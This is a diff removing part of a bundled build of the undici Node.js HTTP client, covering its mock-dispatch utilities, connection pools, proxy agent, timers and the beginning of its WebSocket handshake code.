headerValue] - }) - ) -} - -/** - * @param {import('../../index').Headers|string[]|Record} headers - * @param {string} key - */ -function getHeaderByName (headers, key) { - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { - return headers[i + 1] - } - } - - return undefined - } else if (typeof headers.get === 'function') { - return headers.get(key) - } else { - return lowerCaseEntries(headers)[key.toLocaleLowerCase()] - } -} - -/** @param {string[]} headers */ -function buildHeadersFromArray (headers) { // fetch HeadersList - const clone = headers.slice() - const entries = [] - for (let index = 0; index < clone.length; index += 2) { - entries.push([clone[index], clone[index + 1]]) - } - return Object.fromEntries(entries) -} - -function matchHeaders (mockDispatch, headers) { - if (typeof mockDispatch.headers === 'function') { - if (Array.isArray(headers)) { // fetch HeadersList - headers = buildHeadersFromArray(headers) - } - return mockDispatch.headers(headers ? 
lowerCaseEntries(headers) : {}) - } - if (typeof mockDispatch.headers === 'undefined') { - return true - } - if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { - return false - } - - for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { - const headerValue = getHeaderByName(headers, matchHeaderName) - - if (!matchValue(matchHeaderValue, headerValue)) { - return false - } - } - return true -} - -function safeUrl (path) { - if (typeof path !== 'string') { - return path - } - - const pathSegments = path.split('?') - - if (pathSegments.length !== 2) { - return path - } - - const qp = new URLSearchParams(pathSegments.pop()) - qp.sort() - return [...pathSegments, qp.toString()].join('?') -} - -function matchKey (mockDispatch, { path, method, body, headers }) { - const pathMatch = matchValue(mockDispatch.path, path) - const methodMatch = matchValue(mockDispatch.method, method) - const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true - const headersMatch = matchHeaders(mockDispatch, headers) - return pathMatch && methodMatch && bodyMatch && headersMatch -} - -function getResponseData (data) { - if (Buffer.isBuffer(data)) { - return data - } else if (typeof data === 'object') { - return JSON.stringify(data) - } else { - return data.toString() - } -} - -function getMockDispatch (mockDispatches, key) { - const basePath = key.query ? buildURL(key.path, key.query) : key.path - const resolvedPath = typeof basePath === 'string' ? 
safeUrl(basePath) : basePath - - // Match path - let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) - } - - // Match method - matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) - } - - // Match body - matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) - } - - // Match headers - matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) - } - - return matchedMockDispatches[0] -} - -function addMockDispatch (mockDispatches, key, data) { - const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } - const replyData = typeof data === 'function' ? 
{ callback: data } : { ...data } - const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } - mockDispatches.push(newMockDispatch) - return newMockDispatch -} - -function deleteMockDispatch (mockDispatches, key) { - const index = mockDispatches.findIndex(dispatch => { - if (!dispatch.consumed) { - return false - } - return matchKey(dispatch, key) - }) - if (index !== -1) { - mockDispatches.splice(index, 1) - } -} - -function buildKey (opts) { - const { path, method, body, headers, query } = opts - return { - path, - method, - body, - headers, - query - } -} - -function generateKeyValues (data) { - return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ - ...keyValuePairs, - Buffer.from(`${key}`), - Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) - ], []) -} - -/** - * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status - * @param {number} statusCode - */ -function getStatusText (statusCode) { - return STATUS_CODES[statusCode] || 'unknown' -} - -async function getResponse (body) { - const buffers = [] - for await (const data of body) { - buffers.push(data) - } - return Buffer.concat(buffers).toString('utf8') -} - -/** - * Mock dispatch function used to simulate undici dispatches - */ -function mockDispatch (opts, handler) { - // Get mock dispatch from built key - const key = buildKey(opts) - const mockDispatch = getMockDispatch(this[kDispatches], key) - - mockDispatch.timesInvoked++ - - // Here's where we resolve a callback if a callback is present for the dispatch data. 
- if (mockDispatch.data.callback) { - mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } - } - - // Parse mockDispatch data - const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch - const { timesInvoked, times } = mockDispatch - - // If it's used up and not persistent, mark as consumed - mockDispatch.consumed = !persist && timesInvoked >= times - mockDispatch.pending = timesInvoked < times - - // If specified, trigger dispatch error - if (error !== null) { - deleteMockDispatch(this[kDispatches], key) - handler.onError(error) - return true - } - - // Handle the request with a delay if necessary - if (typeof delay === 'number' && delay > 0) { - setTimeout(() => { - handleReply(this[kDispatches]) - }, delay) - } else { - handleReply(this[kDispatches]) - } - - function handleReply (mockDispatches, _data = data) { - // fetch's HeadersList is a 1D string array - const optsHeaders = Array.isArray(opts.headers) - ? buildHeadersFromArray(opts.headers) - : opts.headers - const body = typeof _data === 'function' - ? _data({ ...opts, headers: optsHeaders }) - : _data - - // util.types.isPromise is likely needed for jest. - if (isPromise(body)) { - // If handleReply is asynchronous, throwing an error - // in the callback will reject the promise, rather than - // synchronously throw the error, which breaks some tests. - // Rather, we wait for the callback to resolve if it is a - // promise, and then re-run handleReply with the new body. 
- body.then((newData) => handleReply(mockDispatches, newData)) - return - } - - const responseData = getResponseData(body) - const responseHeaders = generateKeyValues(headers) - const responseTrailers = generateKeyValues(trailers) - - handler.abort = nop - handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) - handler.onData(Buffer.from(responseData)) - handler.onComplete(responseTrailers) - deleteMockDispatch(mockDispatches, key) - } - - function resume () {} - - return true -} - -function buildMockDispatch () { - const agent = this[kMockAgent] - const origin = this[kOrigin] - const originalDispatch = this[kOriginalDispatch] - - return function dispatch (opts, handler) { - if (agent.isMockActive) { - try { - mockDispatch.call(this, opts, handler) - } catch (error) { - if (error instanceof MockNotMatchedError) { - const netConnect = agent[kGetNetConnect]() - if (netConnect === false) { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) - } - if (checkNetConnect(netConnect, origin)) { - originalDispatch.call(this, opts, handler) - } else { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) - } - } else { - throw error - } - } - } else { - originalDispatch.call(this, opts, handler) - } - } -} - -function checkNetConnect (netConnect, origin) { - const url = new URL(origin) - if (netConnect === true) { - return true - } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { - return true - } - return false -} - -function buildMockOptions (opts) { - if (opts) { - const { agent, ...mockOptions } = opts - return mockOptions - } -} - -module.exports = { - getResponseData, - getMockDispatch, - addMockDispatch, - deleteMockDispatch, - buildKey, - generateKeyValues, - matchValue, - getResponse, - getStatusText, - 
mockDispatch, - buildMockDispatch, - checkNetConnect, - buildMockOptions, - getHeaderByName -} - - -/***/ }), - -/***/ 6823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Transform } = __nccwpck_require__(2781) -const { Console } = __nccwpck_require__(6206) - -/** - * Gets the output of `console.table(…)` as a string. - */ -module.exports = class PendingInterceptorsFormatter { - constructor ({ disableColors } = {}) { - this.transform = new Transform({ - transform (chunk, _enc, cb) { - cb(null, chunk) - } - }) - - this.logger = new Console({ - stdout: this.transform, - inspectOptions: { - colors: !disableColors && !process.env.CI - } - }) - } - - format (pendingInterceptors) { - const withPrettyHeaders = pendingInterceptors.map( - ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ - Method: method, - Origin: origin, - Path: path, - 'Status code': statusCode, - Persistent: persist ? '✅' : 'âŒ', - Invocations: timesInvoked, - Remaining: persist ? Infinity : times - timesInvoked - })) - - this.logger.table(withPrettyHeaders) - return this.transform.read().toString() - } -} - - -/***/ }), - -/***/ 8891: -/***/ ((module) => { - -"use strict"; - - -const singulars = { - pronoun: 'it', - is: 'is', - was: 'was', - this: 'this' -} - -const plurals = { - pronoun: 'they', - is: 'are', - was: 'were', - this: 'these' -} - -module.exports = class Pluralizer { - constructor (singular, plural) { - this.singular = singular - this.plural = plural - } - - pluralize (count) { - const one = count === 1 - const keys = one ? singulars : plurals - const noun = one ? this.singular : this.plural - return { ...keys, count, noun } - } -} - - -/***/ }), - -/***/ 8266: -/***/ ((module) => { - -"use strict"; -/* eslint-disable */ - - - -// Extracted from node/lib/internal/fixed_queue.js - -// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. 
-const kSize = 2048; -const kMask = kSize - 1; - -// The FixedQueue is implemented as a singly-linked list of fixed-size -// circular buffers. It looks something like this: -// -// head tail -// | | -// v v -// +-----------+ <-----\ +-----------+ <------\ +-----------+ -// | [null] | \----- | next | \------- | next | -// +-----------+ +-----------+ +-----------+ -// | item | <-- bottom | item | <-- bottom | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | bottom --> | item | -// | item | | item | | item | -// | ... | | ... | | ... | -// | item | | item | | item | -// | item | | item | | item | -// | [empty] | <-- top | item | | item | -// | [empty] | | item | | item | -// | [empty] | | [empty] | <-- top top --> | [empty] | -// +-----------+ +-----------+ +-----------+ -// -// Or, if there is only one circular buffer, it looks something -// like either of these: -// -// head tail head tail -// | | | | -// v v v v -// +-----------+ +-----------+ -// | [null] | | [null] | -// +-----------+ +-----------+ -// | [empty] | | item | -// | [empty] | | item | -// | item | <-- bottom top --> | [empty] | -// | item | | [empty] | -// | [empty] | <-- top bottom --> | item | -// | [empty] | | item | -// +-----------+ +-----------+ -// -// Adding a value means moving `top` forward by one, removing means -// moving `bottom` forward by one. After reaching the end, the queue -// wraps around. -// -// When `top === bottom` the current queue is empty and when -// `top + 1 === bottom` it's full. This wastes a single space of storage -// but allows much quicker checks. 
- -class FixedCircularBuffer { - constructor() { - this.bottom = 0; - this.top = 0; - this.list = new Array(kSize); - this.next = null; - } - - isEmpty() { - return this.top === this.bottom; - } - - isFull() { - return ((this.top + 1) & kMask) === this.bottom; - } - - push(data) { - this.list[this.top] = data; - this.top = (this.top + 1) & kMask; - } - - shift() { - const nextItem = this.list[this.bottom]; - if (nextItem === undefined) - return null; - this.list[this.bottom] = undefined; - this.bottom = (this.bottom + 1) & kMask; - return nextItem; - } -} - -module.exports = class FixedQueue { - constructor() { - this.head = this.tail = new FixedCircularBuffer(); - } - - isEmpty() { - return this.head.isEmpty(); - } - - push(data) { - if (this.head.isFull()) { - // Head is full: Creates a new queue, sets the old queue's `.next` to it, - // and sets it as the new main queue. - this.head = this.head.next = new FixedCircularBuffer(); - } - this.head.push(data); - } - - shift() { - const tail = this.tail; - const next = tail.shift(); - if (tail.isEmpty() && tail.next !== null) { - // If there is another queue, it forms the new tail. 
- this.tail = tail.next; - } - return next; - } -}; - - -/***/ }), - -/***/ 3198: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const DispatcherBase = __nccwpck_require__(4839) -const FixedQueue = __nccwpck_require__(8266) -const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) -const PoolStats = __nccwpck_require__(9689) - -const kClients = Symbol('clients') -const kNeedDrain = Symbol('needDrain') -const kQueue = Symbol('queue') -const kClosedResolve = Symbol('closed resolve') -const kOnDrain = Symbol('onDrain') -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kGetDispatcher = Symbol('get dispatcher') -const kAddClient = Symbol('add client') -const kRemoveClient = Symbol('remove client') -const kStats = Symbol('stats') - -class PoolBase extends DispatcherBase { - constructor () { - super() - - this[kQueue] = new FixedQueue() - this[kClients] = [] - this[kQueued] = 0 - - const pool = this - - this[kOnDrain] = function onDrain (origin, targets) { - const queue = pool[kQueue] - - let needDrain = false - - while (!needDrain) { - const item = queue.shift() - if (!item) { - break - } - pool[kQueued]-- - needDrain = !this.dispatch(item.opts, item.handler) - } - - this[kNeedDrain] = needDrain - - if (!this[kNeedDrain] && pool[kNeedDrain]) { - pool[kNeedDrain] = false - pool.emit('drain', origin, [pool, ...targets]) - } - - if (pool[kClosedResolve] && queue.isEmpty()) { - Promise - .all(pool[kClients].map(c => c.close())) - .then(pool[kClosedResolve]) - } - } - - this[kOnConnect] = (origin, targets) => { - pool.emit('connect', origin, [pool, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - pool.emit('disconnect', origin, [pool, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - 
pool.emit('connectionError', origin, [pool, ...targets], err) - } - - this[kStats] = new PoolStats(this) - } - - get [kBusy] () { - return this[kNeedDrain] - } - - get [kConnected] () { - return this[kClients].filter(client => client[kConnected]).length - } - - get [kFree] () { - return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length - } - - get [kPending] () { - let ret = this[kQueued] - for (const { [kPending]: pending } of this[kClients]) { - ret += pending - } - return ret - } - - get [kRunning] () { - let ret = 0 - for (const { [kRunning]: running } of this[kClients]) { - ret += running - } - return ret - } - - get [kSize] () { - let ret = this[kQueued] - for (const { [kSize]: size } of this[kClients]) { - ret += size - } - return ret - } - - get stats () { - return this[kStats] - } - - async [kClose] () { - if (this[kQueue].isEmpty()) { - return Promise.all(this[kClients].map(c => c.close())) - } else { - return new Promise((resolve) => { - this[kClosedResolve] = resolve - }) - } - } - - async [kDestroy] (err) { - while (true) { - const item = this[kQueue].shift() - if (!item) { - break - } - item.handler.onError(err) - } - - return Promise.all(this[kClients].map(c => c.destroy(err))) - } - - [kDispatch] (opts, handler) { - const dispatcher = this[kGetDispatcher]() - - if (!dispatcher) { - this[kNeedDrain] = true - this[kQueue].push({ opts, handler }) - this[kQueued]++ - } else if (!dispatcher.dispatch(opts, handler)) { - dispatcher[kNeedDrain] = true - this[kNeedDrain] = !this[kGetDispatcher]() - } - - return !this[kNeedDrain] - } - - [kAddClient] (client) { - client - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].push(client) - - if (this[kNeedDrain]) { - process.nextTick(() => { - if (this[kNeedDrain]) { - this[kOnDrain](client[kUrl], [this, client]) - } - }) - } - - return this - } - - 
[kRemoveClient] (client) { - client.close(() => { - const idx = this[kClients].indexOf(client) - if (idx !== -1) { - this[kClients].splice(idx, 1) - } - }) - - this[kNeedDrain] = this[kClients].some(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - } -} - -module.exports = { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} - - -/***/ }), - -/***/ 9689: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) -const kPool = Symbol('pool') - -class PoolStats { - constructor (pool) { - this[kPool] = pool - } - - get connected () { - return this[kPool][kConnected] - } - - get free () { - return this[kPool][kFree] - } - - get pending () { - return this[kPool][kPending] - } - - get queued () { - return this[kPool][kQueued] - } - - get running () { - return this[kPool][kRunning] - } - - get size () { - return this[kPool][kSize] - } -} - -module.exports = PoolStats - - -/***/ }), - -/***/ 4634: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Client = __nccwpck_require__(3598) -const { - InvalidArgumentError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const buildConnector = __nccwpck_require__(2067) - -const kOptions = Symbol('options') -const kConnections = Symbol('connections') -const kFactory = Symbol('factory') - -function defaultFactory (origin, opts) { - return new Client(origin, opts) -} - -class Pool extends PoolBase { - constructor (origin, { - connections, - factory = defaultFactory, - connect, - connectTimeout, - tls, - maxCachedSessions, - socketPath, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - 
allowH2, - ...options - } = {}) { - super() - - if (connections != null && (!Number.isFinite(connections) || connections < 0)) { - throw new InvalidArgumentError('invalid connections') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) - ? options.interceptors.Pool - : [] - this[kConnections] = connections || null - this[kUrl] = util.parseOrigin(origin) - this[kOptions] = { ...util.deepClone(options), connect, allowH2 } - this[kOptions].interceptors = options.interceptors - ? 
{ ...options.interceptors } - : undefined - this[kFactory] = factory - } - - [kGetDispatcher] () { - let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) - - if (dispatcher) { - return dispatcher - } - - if (!this[kConnections] || this[kClients].length < this[kConnections]) { - dispatcher = this[kFactory](this[kUrl], this[kOptions]) - this[kAddClient](dispatcher) - } - - return dispatcher - } -} - -module.exports = Pool - - -/***/ }), - -/***/ 7858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) -const { URL } = __nccwpck_require__(7310) -const Agent = __nccwpck_require__(7890) -const Pool = __nccwpck_require__(4634) -const DispatcherBase = __nccwpck_require__(4839) -const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) - -const kAgent = Symbol('proxy agent') -const kClient = Symbol('proxy client') -const kProxyHeaders = Symbol('proxy headers') -const kRequestTls = Symbol('request tls settings') -const kProxyTls = Symbol('proxy tls settings') -const kConnectEndpoint = Symbol('connect endpoint function') - -function defaultProtocolPort (protocol) { - return protocol === 'https:' ? 443 : 80 -} - -function buildProxyOptions (opts) { - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - return { - uri: opts.uri, - protocol: opts.protocol || 'https' - } -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class ProxyAgent extends DispatcherBase { - constructor (opts) { - super(opts) - this[kProxy] = buildProxyOptions(opts) - this[kAgent] = new Agent(opts) - this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) - ? 
opts.interceptors.ProxyAgent - : [] - - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - const { clientFactory = defaultFactory } = opts - - if (typeof clientFactory !== 'function') { - throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') - } - - this[kRequestTls] = opts.requestTls - this[kProxyTls] = opts.proxyTls - this[kProxyHeaders] = opts.headers || {} - - const resolvedUrl = new URL(opts.uri) - const { origin, port, host, username, password } = resolvedUrl - - if (opts.auth && opts.token) { - throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') - } else if (opts.auth) { - /* @deprecated in favour of opts.token */ - this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` - } else if (opts.token) { - this[kProxyHeaders]['proxy-authorization'] = opts.token - } else if (username && password) { - this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` - } - - const connect = buildConnector({ ...opts.proxyTls }) - this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) - this[kClient] = clientFactory(resolvedUrl, { connect }) - this[kAgent] = new Agent({ - ...opts, - connect: async (opts, callback) => { - let requestedHost = opts.host - if (!opts.port) { - requestedHost += `:${defaultProtocolPort(opts.protocol)}` - } - try { - const { socket, statusCode } = await this[kClient].connect({ - origin, - port, - path: requestedHost, - signal: opts.signal, - headers: { - ...this[kProxyHeaders], - host - } - }) - if (statusCode !== 200) { - socket.on('error', () => {}).destroy() - callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) - } - if (opts.protocol !== 'https:') { - callback(null, socket) - return - } - let servername - if 
(this[kRequestTls]) { - servername = this[kRequestTls].servername - } else { - servername = opts.servername - } - this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) - } catch (err) { - callback(err) - } - } - }) - } - - dispatch (opts, handler) { - const { host } = new URL(opts.origin) - const headers = buildHeaders(opts.headers) - throwIfProxyAuthIsSent(headers) - return this[kAgent].dispatch( - { - ...opts, - headers: { - ...headers, - host - } - }, - handler - ) - } - - async [kClose] () { - await this[kAgent].close() - await this[kClient].close() - } - - async [kDestroy] () { - await this[kAgent].destroy() - await this[kClient].destroy() - } -} - -/** - * @param {string[] | Record} headers - * @returns {Record} - */ -function buildHeaders (headers) { - // When using undici.fetch, the headers list is stored - // as an array. - if (Array.isArray(headers)) { - /** @type {Record} */ - const headersPair = {} - - for (let i = 0; i < headers.length; i += 2) { - headersPair[headers[i]] = headers[i + 1] - } - - return headersPair - } - - return headers -} - -/** - * @param {Record} headers - * - * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers - * Nevertheless, it was changed and to avoid a security vulnerability by end users - * this check was created. 
- * It should be removed in the next major version for performance reasons - */ -function throwIfProxyAuthIsSent (headers) { - const existProxyAuth = headers && Object.keys(headers) - .find((key) => key.toLowerCase() === 'proxy-authorization') - if (existProxyAuth) { - throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') - } -} - -module.exports = ProxyAgent - - -/***/ }), - -/***/ 9459: -/***/ ((module) => { - -"use strict"; - - -let fastNow = Date.now() -let fastNowTimeout - -const fastTimers = [] - -function onTimeout () { - fastNow = Date.now() - - let len = fastTimers.length - let idx = 0 - while (idx < len) { - const timer = fastTimers[idx] - - if (timer.state === 0) { - timer.state = fastNow + timer.delay - } else if (timer.state > 0 && fastNow >= timer.state) { - timer.state = -1 - timer.callback(timer.opaque) - } - - if (timer.state === -1) { - timer.state = -2 - if (idx !== len - 1) { - fastTimers[idx] = fastTimers.pop() - } else { - fastTimers.pop() - } - len -= 1 - } else { - idx += 1 - } - } - - if (fastTimers.length > 0) { - refreshTimeout() - } -} - -function refreshTimeout () { - if (fastNowTimeout && fastNowTimeout.refresh) { - fastNowTimeout.refresh() - } else { - clearTimeout(fastNowTimeout) - fastNowTimeout = setTimeout(onTimeout, 1e3) - if (fastNowTimeout.unref) { - fastNowTimeout.unref() - } - } -} - -class Timeout { - constructor (callback, delay, opaque) { - this.callback = callback - this.delay = delay - this.opaque = opaque - - // -2 not in timer list - // -1 in timer list but inactive - // 0 in timer list waiting for time - // > 0 in timer list waiting for time to expire - this.state = -2 - - this.refresh() - } - - refresh () { - if (this.state === -2) { - fastTimers.push(this) - if (!fastNowTimeout || fastTimers.length === 1) { - refreshTimeout() - } - } - - this.state = 0 - } - - clear () { - this.state = -1 - } -} - -module.exports = { - setTimeout (callback, delay, opaque) { - return delay < 
1e3 - ? setTimeout(callback, delay, opaque) - : new Timeout(callback, delay, opaque) - }, - clearTimeout (timeout) { - if (timeout instanceof Timeout) { - timeout.clear() - } else { - clearTimeout(timeout) - } - } -} - - -/***/ }), - -/***/ 5354: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const diagnosticsChannel = __nccwpck_require__(7643) -const { uid, states } = __nccwpck_require__(9188) -const { - kReadyState, - kSentClose, - kByteParser, - kReceivedClose -} = __nccwpck_require__(7578) -const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) -const { CloseEvent } = __nccwpck_require__(2611) -const { makeRequest } = __nccwpck_require__(8359) -const { fetching } = __nccwpck_require__(4881) -const { Headers } = __nccwpck_require__(554) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { kHeadersList } = __nccwpck_require__(2785) - -const channels = {} -channels.open = diagnosticsChannel.channel('undici:websocket:open') -channels.close = diagnosticsChannel.channel('undici:websocket:close') -channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -/** - * @see https://websockets.spec.whatwg.org/#concept-websocket-establish - * @param {URL} url - * @param {string|string[]} protocols - * @param {import('./websocket').WebSocket} ws - * @param {(response: any) => void} onEstablish - * @param {Partial} options - */ -function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { - // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s - // scheme is "ws", and to "https" otherwise. - const requestURL = url - - requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' - - // 2. 
Let request be a new request, whose URL is requestURL, client is client, - // service-workers mode is "none", referrer is "no-referrer", mode is - // "websocket", credentials mode is "include", cache mode is "no-store" , - // and redirect mode is "error". - const request = makeRequest({ - urlList: [requestURL], - serviceWorkers: 'none', - referrer: 'no-referrer', - mode: 'websocket', - credentials: 'include', - cache: 'no-store', - redirect: 'error' - }) - - // Note: undici extension, allow setting custom headers. - if (options.headers) { - const headersList = new Headers(options.headers)[kHeadersList] - - request.headersList = headersList - } - - // 3. Append (`Upgrade`, `websocket`) to request’s header list. - // 4. Append (`Connection`, `Upgrade`) to request’s header list. - // Note: both of these are handled by undici currently. - // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 - - // 5. Let keyValue be a nonce consisting of a randomly selected - // 16-byte value that has been forgiving-base64-encoded and - // isomorphic encoded. - const keyValue = crypto.randomBytes(16).toString('base64') - - // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s - // header list. - request.headersList.append('sec-websocket-key', keyValue) - - // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s - // header list. - request.headersList.append('sec-websocket-version', '13') - - // 8. For each protocol in protocols, combine - // (`Sec-WebSocket-Protocol`, protocol) in request’s header - // list. - for (const protocol of protocols) { - request.headersList.append('sec-websocket-protocol', protocol) - } - - // 9. Let permessageDeflate be a user-agent defined - // "permessage-deflate" extension header value. 
- // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 - // TODO: enable once permessage-deflate is supported - const permessageDeflate = '' // 'permessage-deflate; 15' - - // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to - // request’s header list. - // request.headersList.append('sec-websocket-extensions', permessageDeflate) - - // 11. Fetch request with useParallelQueue set to true, and - // processResponse given response being these steps: - const controller = fetching({ - request, - useParallelQueue: true, - dispatcher: options.dispatcher ?? getGlobalDispatcher(), - processResponse (response) { - // 1. If response is a network error or its status is not 101, - // fail the WebSocket connection. - if (response.type === 'error' || response.status !== 101) { - failWebsocketConnection(ws, 'Received network error or non-101 status code.') - return - } - - // 2. If protocols is not the empty list and extracting header - // list values given `Sec-WebSocket-Protocol` and response’s - // header list results in null, failure, or the empty byte - // sequence, then fail the WebSocket connection. - if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Server did not respond with sent protocols.') - return - } - - // 3. Follow the requirements stated step 2 to step 6, inclusive, - // of the last set of steps in section 4.1 of The WebSocket - // Protocol to validate response. This either results in fail - // the WebSocket connection or the WebSocket connection is - // established. - - // 2. If the response lacks an |Upgrade| header field or the |Upgrade| - // header field contains a value that is not an ASCII case- - // insensitive match for the value "websocket", the client MUST - // _Fail the WebSocket Connection_. 
- if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { - failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') - return - } - - // 3. If the response lacks a |Connection| header field or the - // |Connection| header field doesn't contain a token that is an - // ASCII case-insensitive match for the value "Upgrade", the client - // MUST _Fail the WebSocket Connection_. - if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { - failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') - return - } - - // 4. If the response lacks a |Sec-WebSocket-Accept| header field or - // the |Sec-WebSocket-Accept| contains a value other than the - // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- - // Key| (as a string, not base64-decoded) with the string "258EAFA5- - // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and - // trailing whitespace, the client MUST _Fail the WebSocket - // Connection_. - const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') - const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') - if (secWSAccept !== digest) { - failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') - return - } - - // 5. If the response includes a |Sec-WebSocket-Extensions| header - // field and this header field indicates the use of an extension - // that was not present in the client's handshake (the server has - // indicated an extension not requested by the client), the client - // MUST _Fail the WebSocket Connection_. (The parsing of this - 